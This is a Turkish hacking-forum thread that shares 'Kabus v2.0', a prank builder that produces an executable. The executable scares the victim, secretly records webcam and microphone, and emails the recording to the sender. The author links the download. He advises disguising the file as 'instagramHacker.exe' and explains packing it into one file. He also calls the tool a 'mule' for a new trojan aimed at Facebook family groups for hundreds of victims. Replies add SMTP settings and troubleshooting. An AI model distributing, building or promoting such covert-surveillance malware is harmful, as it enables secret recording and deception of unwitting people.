C#: Kabus v2.0 - Daha optimize, daha korkunç

zztri

Yaşayan Forum Efsanesi
9 Tem 2015
10,053
4
390
Ankara
Hani tam ciddi bir işe konsantre olmuşken eşinizin hala kızının kocası arar da, "Zztri abi bir adam var küfrediyo instagramda onun hesabını çalabilin mi?" der ya...

Bu program öylelerine göndermeniz içindir. Program ilk olarak kurbanınızı elinden geldiğince korkutur, ikinci olarak da elemanın korkusunun zirvede olduğu anda webcam bulabilirse webcam, mikrofon bulabilirse ses kaydı alır ve size oluşturduğu video dosyasını mail olarak gönderir.

Kullanımı gayet basit. Önce paylaştığım dosyayı çift tıklayalım.. Korkmayın bu hali sadece "stub" hazırlamakta. Yani verdiğiniz mail bilgilerini exe'nin içine gömecek, ancak ondan sonra oluşan dosya korkutacak.

image.png

Eğer kendi e-posta sunucunuzun mail ayarlarını bilmiyorsanız, hızlıca google'dan öğrenirsiniz.

Ardından "Test Et" düğmesi ile kendinize mail gelip gelmediğinden emin olursunuz, "Şakayı üret " düğmesini kullandığınızda program aynı klasörde "hazirlanmisSaka.exe"'yi oluşturacaktır. Adını "instagramHacker.exe" yapın ve gönderin kurbanınıza.

Bu dosyayı birine gönderdiğinizde eşek şakasını yapar, şakanın son anında elemanın videosunu çeker ve size mail olarak atar. Bu kadar.

Videosunu çekmiyorum çünkü ilk olarak Camtasia'yı kaldırmışım, kurmaya uğraşamayacağım, ikinci olarak da sürpriz olsun, test için bir izleyin canım.

İndirme linki: https://gofile.io/?c=uJVjQo (Eseksakasi.exe'nin hizasındaki hard diske indirme sembolüne basın)
Virüstotal: https://www.virustotal.com/gui/file...8459b3021a5f62fd762c929cfcc68e7242f/detection

Virüstotal'de 9 çıkması doğal. Şaka dosyası kolay taşınsın diye 3 managed 2 unmanaged dll'i pack ettim, webcam'e erişiyor, ekran görüntüsüne erişiyor, exe sonuna veri append ediyor, ben olsam ben de şüphelenirdim. Şüphelenirseniz yönetimin kontrolünü bekleyin.

[ame]https://www.youtube.com/watch?v=NnXxfwIVcUc[/ame]

Son düzenleme:

zztri

Yaşayan Forum Efsanesi
9 Tem 2015
10,053
4
390
Ankara
Phemis izle ama önce... Yeterince korkunç olmuş mu?

Gece uyuyamadım, itiraf edeyim son versiyonuna tıklayıp sonra tıkladığımı unuttuğumda, kulaklıklar da kulağımda olunca beni de korkuttu.

LETRX

Katılımcı Üye
21 Ocak 2010
355
4
Tromsø
Gmail için smtp ayarları : smtp.gmail.com Gmail İçin port : 587 olması gerek yanlış hatırlamıyorsam.
Elinize sağlık artık birazda olsa kurtulabilirsiniz onlardan .D
İyi günler.

Son düzenleme:

DarkHawk06

Uzman üye
12 Şub 2016
1,046
1
8
Pandora
zztri hocam güzel bir uygulama olmuş. Sizleri tekrardan konu paylaşmanız mutluluk verici, konularınızı iple çekiyorum. :)

LETRX

Katılımcı Üye
21 Ocak 2010
355
4
Tromsø
hocam programı şimdi denedim ama bilgiler doğru değil diyor ? herşeyi doğru yazdığıma eminim.

anonuser23532

Kıdemli Üye
9 Ara 2017
2,602
12
@Phemis izle ama önce... Yeterince korkunç olmuş mu?

Gece uyuyamadım, itiraf edeyim son versiyonuna tıklayıp sonra tıkladığımı unuttuğumda, kulaklıklar da kulağımda olunca beni de korkuttu.

Oldum olası korkmuşumdur şu kızdan :(
Bu arada oluşan programı yanlışlıkla açınca daha korkunç oluyormuş :trl:trl:D
Keşke daha güçlü bir packer seçseydin abi :(

Emeğine sağlık..​

Son düzenleme:

zztri

Yaşayan Forum Efsanesi
9 Tem 2015
10,053
4
390
Ankara
Oldum olası korkmuşumdur şu kızdan :(
Bu arada oluşan programı yanlışlıkla açınca daha korkunç oluyormuş :trl :trl :D
Keşke daha güçlü bir packer seçseydin abi :(
Emeğine sağlık..

Packer modded Confuserex'in kendi packer'ı.. Özellikle aramadım. Tek amacı elemana bir zip dosyası değil de tek dosya gönderebilmek. Zaten unmanaged'lar da exe'nin içinde, program çalıştığında onları da doğru lokasyona açıyor. Bu kısım trojanlarda da kullandığım bir yöntem. Kullanıcı gördüğünde çok geç olmuş oluyor.

Tabii bunda yok trojan filan canım. Ondan fazla kasmadım yani. Önemli olan kurbanı tek bir dosyaya tıklatıp, sonra da korkusunu videodan izlemek.

siracalan212

Yeni üye
26 Mar 2019
29
0
programı ilk olarak denediğimde biraz ürkmedim değil ;) onun dışında test et dediğimde sıkıntısız şekilde test maili geldi ancak denediğimde denediğim bilgisayarda şaka çalıştı ama epostamı herhangi bir mail gelmedi bilgisayarda herhangi bir mikrofon veya kamera olmadığından dolayı sanırsam gerçekten başarılı bir çalışma olmuş başarılarının devamını diliyorum..

zztri

Yaşayan Forum Efsanesi
9 Tem 2015
10,053
4
390
Ankara
programı ilk olarak denediğimde biraz ürkmedim değil ;) onun dışında test et dediğimde sıkıntısız şekilde test maili geldi ancak denediğimde denediğim bilgisayarda şaka çalıştı ama epostamı herhangi bir mail gelmedi bilgisayarda herhangi bir mikrofon veya kamera olmadığından dolayı sanırsam gerçekten başarılı bir çalışma olmuş başarılarının devamını diliyorum..

Haa.. ne mikrofon, ne de kamera olmazsa doğrudur, göndermez. Hani göndermesinin mantığı da olmuyor zaten, kurbanın suratını ne yazık ki yakalayamıyorsunuz.

tikkynee

Katılımcı Üye
26 Haz 2012
290
2
Hani tam ciddi bir işe konsantre olmuşken eşinizin hala kızının kocası arar da, "Zztri abi bir adam var küfrediyo instagramda onun hesabını çalabilin mi?" der ya...

Bu program öylelerine göndermeniz içindir. Program ilk olarak kurbanınızı elinden geldiğince korkutur, ikinci olarak da elemanın korkusunun zirvede olduğu anda webcam bulabilirse webcam, mikrofon bulabilirse ses kaydı alır ve size oluşturduğu video dosyasını mail olarak gönderir.

Kullanımı gayet basit. Önce paylaştığım dosyayı çift tıklayalım.. Korkmayın bu hali sadece "stub" hazırlamakta. Yani verdiğiniz mail bilgilerini exe'nin içine gömecek, ancak ondan sonra oluşan dosya korkutacak.

image.png

Eğer kendi e-posta sunucunuzun mail ayarlarını bilmiyorsanız, hızlıca google'dan öğrenirsiniz.

Ardından "Test Et" düğmesi ile kendinize mail gelip gelmediğinden emin olursunuz, "Şakayı üret " düğmesini kullandığınızda program aynı klasörde "hazirlanmisSaka.exe"'yi oluşturacaktır. Adını "instagramHacker.exe" yapın ve gönderin kurbanınıza.

Bu dosyayı birine gönderdiğinizde eşek şakasını yapar, şakanın son anında elemanın videosunu çeker ve size mail olarak atar. Bu kadar.

Videosunu çekmiyorum çünkü ilk olarak Camtasia'yı kaldırmışım, kurmaya uğraşamayacağım, ikinci olarak da sürpriz olsun, test için bir izleyin canım.

İndirme linki: https://gofile.io/?c=uJVjQo (Eseksakasi.exe'nin hizasındaki hard diske indirme sembolüne basın)
Virüstotal: https://www.virustotal.com/gui/file...8459b3021a5f62fd762c929cfcc68e7242f/detection

Virüstotal'de 9 çıkması doğal. Şaka dosyası kolay taşınsın diye 3 managed 2 unmanaged dll'i pack ettim, webcam'e erişiyor, ekran görüntüsüne erişiyor, exe sonuna veri append ediyor, ben olsam ben de şüphelenirdim. Şüphelenirseniz yönetimin kontrolünü bekleyin.

Hahahaha :D ilahi ya bende açtım diyorum ki nedne çalışmıyor kulaklığı taktım sesi de kıstım :D usta ama fotoğraf yada ses gelmedi ? kaç dakikaya gelmesi gerekiyor

zztri

Yaşayan Forum Efsanesi
9 Tem 2015
10,053
4
390
Ankara
Hahahaha :D ilahi ya bende açtım diyorum ki nedne çalışmıyor kulaklığı taktım sesi de kıstım :D usta ama fotoğraf yada ses gelmedi ? kaç dakikaya gelmesi gerekiyor

... Sürpriz! Program otomatik olarak sesi sonuna kadar açar. İlk kabus 30-50 saniye içinde başlar. Tahminimce mesajı attıktan sonra gördün ama...

zztri

Yaşayan Forum Efsanesi
9 Tem 2015
10,053
4
390
Ankara
zztri valla bekliyorum daha ne gelen var ne giden :) Test mesajı duruyor sadece

Doğal olarak sadece kendi bilgisayarımda test ettim... Bu sıkıntılı işte...

Üstad kusura bakma ne olduğunu bilmiyorum. Özellikle programı .NET 2.0 32 bit yaptım olabildiğince çok cihazda çalışsın diye ama... Senin şansına...

İşletim sistemini sorabilir miyim?

tikkynee

Katılımcı Üye
26 Haz 2012
290
2
win 10 Pro 64 1809
bütün güncellemeler tamam , test mesajı da gelmişti zaten :D yeterince korktum da :D ama bi ses kaydı gelmedi cihazda kamera yok sadece mic var

zztri sanırım bir tanesi olmayınca kodlar direk kırılıyor ? if else vermedin mi üstad

Moderatör tarafında düzenlendi:

Ego1st

Uzman üye
15 Mar 2018
1,109
25
hocam sizi yeniden konu açarken görmek güzel.

bu arada çalışıyor ve cidden korktum :)

zztri

Yaşayan Forum Efsanesi
9 Tem 2015
10,053
4
390
Ankara
hocam sizi yeniden konu açarken görmek güzel.

bu arada çalışıyor ve cidden korktum :)

Ne yazık ki kaynak kodunu paylaşmayacağım bunun..

image.png

Yeni bir trojan projesine başladım. Yani dün gece uyuyamayınca yeni trojan yazmaya karar verdim, kafam trojanın kendisini yapacak kadar sağlam olmayınca taşıyıcı programlardan birini yapıverdim. Bu eşek şakası trojanım için "mule" - katır olacak. Yani taşıyıcı programlardan biri olacak. Dili ingilizce yapıp iki üç normal ailelerin takıldığı facebook gruplarına atsam 300-400 kurban gelir minimum..

Ama "şurasını nasıl yaptın" türünden soruların hepsini kod örneğiyle cevaplarım.

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.